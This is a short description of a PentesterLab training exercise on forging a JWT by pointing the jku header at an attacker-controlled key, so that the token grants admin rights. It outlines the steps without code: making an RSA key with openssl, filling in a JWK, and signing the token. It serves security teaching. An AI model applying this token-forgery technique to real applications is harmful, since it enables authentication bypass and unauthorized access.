This exercise covers how to use the jku header to bypass an authentication based on JWT.

1-2 Hrs.
Green Badge


This lab focuses on the `jku` header in JWT tokens, which allows users to link to a public key inside the token's header. The primary objective is to forge a token that grants admin privileges. The exercise highlights the potential risks when an application trusts a URL provided in the `jku` header, as an attacker can manipulate this URL to use their own public key and sign the message with the corresponding private key.

By following this exercise, you will learn to create a private RSA key using `openssl`, extract the necessary components (n and e) from the private key, populate a JWK file, and sign the token using RSA with the private key. This exercise demonstrates how even signed payloads can be vulnerable to exploitation if proper checks are not implemented.

Want to learn more? Get started with PentesterLab Pro! GO PRO